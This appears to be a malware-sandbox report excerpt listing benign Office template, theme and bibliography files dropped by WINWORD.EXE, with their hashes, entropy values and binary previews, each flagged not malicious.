                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):5596
                              Entropy (8bit):7.875182123405584
                              Encrypted:false
                              SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                              MD5:CDC1493350011DB9892100E94D5592FE
                              SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                              SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                              SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                              Malicious:false
                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):274
                              Entropy (8bit):3.438490642908344
                              Encrypted:false
                              SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                              MD5:0F98498818DC28E82597356E2650773C
                              SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                              SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                              SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Word 2007+
                              Category:dropped
                              Size (bytes):34415
                              Entropy (8bit):7.352974342178997
                              Encrypted:false
                              SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                              MD5:7CDFFC23FB85AD5737452762FA36AAA0
                              SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                              SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                              SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                              Malicious:false
                              Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):290
                              Entropy (8bit):3.5161159456784024
                              Encrypted:false
                              SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                              MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                              SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                              SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                              SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):344303
                              Entropy (8bit):5.023195898304535
                              Encrypted:false
                              SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                              MD5:F079EC5E2CCB9CD4529673BCDFB90486
                              SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                              SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                              SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):260
                              Entropy (8bit):3.4895685222798054
                              Encrypted:false
                              SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                              MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                              SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                              SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                              SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):3075
                              Entropy (8bit):7.716021191059687
                              Encrypted:false
                              SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                              MD5:67766FF48AF205B771B53AA2FA82B4F4
                              SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                              SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                              SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                              Malicious:false
                              Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):777647
                              Entropy (8bit):7.689662652914981
                              Encrypted:false
                              SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                              MD5:B30D2EF0FC261AECE90B62E9C5597379
                              SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                              SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                              SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                              Malicious:false
                              Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):290
                              Entropy (8bit):3.5091498509646044
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                              MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                              SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                              SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                              SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):562113
                              Entropy (8bit):7.67409707491542
                              Encrypted:false
                              SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                              MD5:4A1657A3872F9A77EC257F41B8F56B3D
                              SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                              SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                              SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                              Malicious:false
                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):278
                              Entropy (8bit):3.535736910133401
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                              MD5:487E25E610F3FC2EEA27AB54324EA8F6
                              SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                              SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                              SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):1649585
                              Entropy (8bit):7.875240099125746
                              Encrypted:false
                              SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                              MD5:35200E94CEB3BB7A8B34B4E93E039023
                              SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                              SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                              SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                              Malicious:false
                              Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):284
                              Entropy (8bit):3.5552837910707304
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                              MD5:5728F26DF04D174DE9BDFF51D0668E2A
                              SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                              SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                              SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):486596
                              Entropy (8bit):7.668294441507828
                              Encrypted:false
                              SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                              MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                              SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                              SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                              SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                              Malicious:false
                              Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):274
                              Entropy (8bit):3.535303979138867
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                              MD5:35AFE8D8724F3E19EB08274906926A0B
                              SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                              SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                              SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):924687
                              Entropy (8bit):7.824849396154325
                              Encrypted:false
                              SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                              MD5:97EEC245165F2296139EF8D4D43BBB66
                              SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                              SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                              SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                              Malicious:false
                              Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):282
                              Entropy (8bit):3.51145753448333
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                              MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                              SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                              SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                              SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):608122
                              Entropy (8bit):7.729143855239127
                              Encrypted:false
                              SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                              MD5:8BA551EEC497947FC39D1D48EC868B54
                              SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                              SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                              SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                              Malicious:false
